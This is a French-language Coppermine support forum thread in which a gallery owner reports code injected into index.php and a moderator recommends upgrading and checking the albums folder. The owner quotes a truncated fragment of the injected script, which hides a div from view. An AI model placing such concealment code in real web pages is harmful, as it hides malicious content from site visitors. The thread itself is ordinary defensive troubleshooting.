Advanced search  

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Pages: [1]   Go Down

Author Topic: Injection de code dans ma galerie...  (Read 3557 times)

0 Members and 1 Guest are viewing this topic.

panatan

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 92
Injection de code dans ma galerie...
« on: February 19, 2009, 03:41:49 pm »

Bonjour,

Je viens de découvrir qu'un code avait été injecté dans ma galerie, voici un extrait (le code est beaucoup plus long...

Code: [Select]
<div id='sihanw'><script>b='hid';c='den';d=0;a=document.getElementById('sihanw');if(a){a.style.position='absolute';a.style.height=d+'px';a.style.overflow=b+c;}  .....   etc .....</script><!--<</div>
Est-ce une faille connue et les maj permettent-t-elles de résoudre ce problème ?

Merci pour votre aide.

 
Logged

François Keller

  • Moderator
  • Coppermine addict
  • ****
  • Country: fr
  • Offline Offline
  • Gender: Male
  • Posts: 9094
  • aka Frantz
    • Ma galerie
Re: Injection de code dans ma galerie...
« Reply #1 on: February 19, 2009, 04:28:59 pm »

il est difficile de dire si le code vient d'une faille récente ou non de coppermine avec le peu d'indications que nous sont données.
Quelle version de coppermine utilisez vous
le code se trouve dans quels fichiers ?
Y at'il beaucoup de fichiers concernés.
Mais de toute façon, une mise à jour s'impose puisqu'a chaque fois elle permets de corriger des failles de sécurités découvertes...
Logged
Avez vous lu la DOC ? la FAQ ? et cherché sur le forum avant de poster ?
Did you read the DOC ? the FAQ ? and search the board before posting ?
Mon Blog

panatan

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 92
Re: Injection de code dans ma galerie...
« Reply #2 on: February 19, 2009, 04:57:14 pm »

Je crois qu'il s'agit de l'avant dernière version (pas sûr car je n'arrive plus à me connecter à l'admin...)

Le code n'a été ajouté qu'au niveau de l'index.php
Logged

François Keller

  • Moderator
  • Coppermine addict
  • ****
  • Country: fr
  • Offline Offline
  • Gender: Male
  • Posts: 9094
  • aka Frantz
    • Ma galerie
Re: Injection de code dans ma galerie...
« Reply #3 on: February 19, 2009, 05:23:17 pm »

si le site est celui qui est accessible depuis l'icone de ton profil, il est en version 1.4.19. (pas besoin d'accéder à l'administration pour le voir)
Il est indispensable de faire une mise à jour et de vérifier qu'il n'y a pas de fichier avec un  nom bizarre dans le répertoire albums.
Logged
Avez vous lu la DOC ? la FAQ ? et cherché sur le forum avant de poster ?
Did you read the DOC ? the FAQ ? and search the board before posting ?
Mon Blog

panatan

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 92
Re: Injection de code dans ma galerie...
« Reply #4 on: February 19, 2009, 05:25:21 pm »

Faille connue ?
Logged
Pages: [1]   Go Up
 

Page created in 0.099 seconds with 21 queries.